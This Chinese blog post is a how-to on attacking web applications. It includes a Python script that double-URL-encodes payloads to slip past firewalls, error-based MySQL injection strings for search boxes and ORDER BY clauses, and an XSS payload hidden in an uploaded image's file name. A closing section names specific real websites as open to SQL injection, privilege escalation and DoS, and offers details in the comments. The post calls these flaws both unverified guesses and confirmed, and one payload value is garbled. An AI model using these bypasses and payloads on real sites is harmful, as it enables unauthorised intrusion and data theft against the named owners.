Web应用攻击的方法及实践经验

本文介绍了如何利用SQL数据注入(包括检索框、ORDERBY和图片上传)以及XSS攻击的方法。作者提供了漏洞网站示例和常用的扫描工具,同时展示了如何编写Python代码绕过防御机制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

此文章会持续更新,我会发一些已经存在漏洞的网站实例在上边,以便于大家更好直观如何进行Web攻击

本文章的所提到的网站漏洞只是本人猜想,并没有证实,如果发现有雷同的网站漏洞和纯属巧合。

发布网站安全类的网站

第一步:关注漏洞网站
【国家信息安全漏洞共享平台】
https://www.cnvd.org.cn/
【CVE】
https://cve.mitre.org/
【漏洞盒子】斗象科技
https://planet.vulbox.com/detail/MTIxODE=
【山西鑫鼎宸科技股份有限公司】
http://www.sxxdckj.com/cms/c/qita.html?page=2
【360补天平台】
https://www.butian.net/Reward/plan/1

第二步:熟悉扫描工具
例如:
HCL AppScan Standard 【常见的扫描工具】
sqlmap_GUI【进阶版SQl注入工具】
python代码编写【手搓核弹,手动编写代码攻击】

第三步:了解各种防御手段,例如拦截XSS攻击和SQl注入,一般的代码是屏蔽特殊字段和url转译

利用python编写一段代码绕开防火墙和代码拦截

	import string
payload=";p";
retVal = payload
if payload:
    retVal = ""
    i = 0
 
    while i < len(payload):
        if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
            retVal += '%%25%s' % payload[i + 1:i + 3]
            i += 3
        else:
            retVal += '%%25%.2X' % ord(payload[i])
            i += 1
 
print (retVal)

上传这一段是写了一个url2次编码,可以绕过防火墙XSS/SQL等特殊字节
被直接屏蔽掉

SQL数据注入

1.通过检索框注入

mysql 数据库在搜索框中输入:

 1' and extractvalue(

会有暴库的效果,但由于防火墙和代码不让你输入特殊字符和关键词,这时候就可以进行url转码变成

1%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528

这样会绕开防火墙的检测。

2.通过ORDER BY 注入

select * from users order by 字段 ASC ;

字段变成 一下语句利用mysql 函数,进行暴库

extractvalue(1,(select concat(0x7e,user())))

3.通过上传图片xss攻击

将一张图片名改为,即可实现xss攻击 
&lt;img src=x οnerrοr='prompt(1)'&gt;aaaa.jpg

4.常见高危端口

常见的高危端口主要有以下五类,表1-1提供了常见高危端口的不完全列表,供参考。

  1. ●远程管理服务:远程运维是企业IT运维人员的日常工作,而多数远程管理服务都是攻击者的首选目标,直接开放风险巨大。建议部署运维审计系统(如华为UMA1000),并通过VPN接入内网后登录。如未部署运维审计系统,请务必选择安全的加密应用,如SSHv2。
  2. ●局域网服务:这些服务端口安全漏洞多,常被攻击者利用,造成严重的安全事件。此类服务主要应用于企业内网访问,完全可以在出口防火墙上封禁。一般情况下,企业自建DNS服务器仅限于解析自有域名,不会对外开放,因此可以在互联网出口防火墙上封禁DNS服务。
  3. ●互联网服务:SMTP、POP3、IMAP等邮件协议在设计之初没有内置安全性,请使用SSL/TLS加密保护。同样,如果需要对外提供Web服务,请使用HTTPS协议替代HTTP。
  4. ●数据库:所有的数据库端口都不应该对外开放。
  5. ●木马常用端口:攻击者在主机中植入木马以后,会在失陷主机中开放后门端口。常用的后门端口很多,如123、1234、12345、666、4444、3127、31337、27374等。在病毒爆发时期,请封禁此类端口。

已经发现漏洞的网站

已经证实有网站安全问题,如有疑问可以在底下留言评论查看详细漏洞

sql回显

  1. http://www.sanfengruike.com
  2. http://whdkkj.com
  3. https://www.0735.org.cn
  4. http://www.km.cn

用户越权

  1. http://www.gzyxlib.cn/

SQL注入

  1. http://www.hailuozy.com/index.html
  2. http://qiantucc.com/index.html
  3. http://ys.zeiot.cn/xmxz2.aspx

DOS攻击

http://cmp.tcl.com:82/Frame/Login.htm

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值